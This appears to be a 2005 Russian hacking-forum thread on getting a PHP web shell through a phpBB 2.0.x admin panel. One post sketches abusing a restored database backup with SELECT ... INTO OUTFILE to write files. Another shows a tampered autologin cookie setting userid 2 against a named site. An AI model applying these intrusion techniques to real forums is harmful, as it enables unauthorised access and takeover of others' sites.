ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Можно ли получить php шелл из админки phpbb 2.0.1x?
  #1  
Старый 06.03.2005, 13:14
Аватар для [TSH]Corpse
[TSH]Corpse
Новичок
Регистрация: 24.01.2005
Сообщений: 1
Провел на форуме:
795

Репутация: 0
По умолчанию Можно ли получить php шелл из админки phpbb 2.0.1x?

Можно ли получить php шелл из админки phpbb 2.0.1x?
 
Ответить с цитированием

  #2  
Старый 06.03.2005, 13:22
Аватар для KEZ
KEZ
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

Не из 2.0.1 не из 2.0.13 не из админки какого либо другого форума phpBB веб шелл получить нельзя.

Хотя у меня есть альтернативные варианты.
Известно что когда бы делаешь backup, скачивается файл, содержащий mysql-запросы, которые выполняются после восстановления.
Предположим что админ криво настроил с-му и у mysqld есть права на запись в какуюто папку))
Тогда мы бекапаем базу, потом редактируем чтобы выполнялся
SELECT ... FROM phpbb_posts WHERE ...=... INTO OUTFILE "/../../..... ..."
пишем соответствующий пост, чтобы его текст оказался в файле. Потом восстанавливаем базу, и запрос
SELECT ... FROM phpbb_posts WHERE ...=... INTO OUTFILE "/../../..... ..."
выполняется

Последний раз редактировалось KEZ; 06.03.2005 в 13:26..
 
Ответить с цитированием

  #3  
Старый 06.03.2005, 20:04
Аватар для 3pricol3
3pricol3
Новичок
Регистрация: 06.03.2005
Сообщений: 2
Провел на форуме:
0

Репутация: 0
По умолчанию

по поваду взлома Взлом phpBB 2.0.12

3pricol3 (15:31) :
# HTTP Cookie File
# http://www.netscape.com/newsref/std/cookie_spec.html
# This is a generated file! Do not edit.
# To delete cookies, use the Cookie Manager.

kartografs.net.ru FALSE / FALSE 1141647870 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%2 2%22%3Bs%3A6%3A%22userid%22%3Bs%3A2%3A%2254%22%3B% 7D
это написано в куке мозилки переделываю на
3pricol3 (15:31) :
# HTTP Cookie File
# http://www.netscape.com/newsref/std/cookie_spec.html
# This is a generated file! Do not edit.
# To delete cookies, use the Cookie Manager.


kartografs.net.ru FALSE / FALSE 1141647870 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
и ничего не меняется
3pricol3 (15:31) :
почему я что то нетак делаю?
и я запуталась?
 
Ответить с цитированием

  #4  
Старый 06.03.2005, 22:14
Аватар для max_pain89
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию

Цитата:
Сообщение от 3pricol3  
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%2 2%22%3Bs%3A6%3A%22userid%22%3Bs%3A2%3A%2254%22%3B% 7D
phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
и ничего не меняется
3pricol3 (15:31) :
почему я что то нетак делаю?
и я запуталась?
Ты просто дурак
 
Ответить с цитированием

  #5  
Старый 07.03.2005, 00:02
Аватар для Mega_GnoM
Mega_GnoM
Новичок
Регистрация: 06.03.2005
Сообщений: 5
Провел на форуме:
3024

Репутация: 0
По умолчанию

как узнать какая директория имеет право на запись ?
и вообще поподробнее как это реализовать ?
 
Ответить с цитированием

  #6  
Старый 07.03.2005, 03:26
Аватар для coyl
coyl
Участник форума
Регистрация: 14.01.2005
Сообщений: 127
Провел на форуме:
96115

Репутация: 5
По умолчанию

Ты говорил про строку типа:
SELECT ... FROM phpbb_posts WHERE ...=... INTO OUTFILE "/../../..... ..."
У меня такой вопрос - как грамотно прописать путь к папке, в которую идет запись, если я не знаю, где лежат файлы самого сайта, т.е. полный путь(типа home/.../www/forum) указать не могу
 
Ответить с цитированием

  #7  
Старый 07.03.2005, 04:03
Аватар для [Tsh] *CorPSe*
[Tsh] *CorPSe*
Новичок
Регистрация: 06.03.2005
Сообщений: 8
Провел на форуме:
0

Репутация: 0
Отправить сообщение для [Tsh] *CorPSe* с помощью ICQ
По умолчанию

Kez > Не мог бы написать полный запрос?
Я в мускулах 0 .. т.е учу но результаты мизерные.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP, PERL, MySQL, JavaScript 186 21.02.2010 02:41
химия своими руками silveran Болталка 43 11.01.2006 22:05
Безопасность в Php, Часть Iii k00p3r Чужие Статьи 0 11.07.2005 19:02
Пишем Php код, устойчивый к ошибкам k00p3r Чужие Статьи 0 10.07.2005 22:34
Защищаем Php. Шаг за шагом. k00p3r Чужие Статьи 0 13.06.2005 11:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ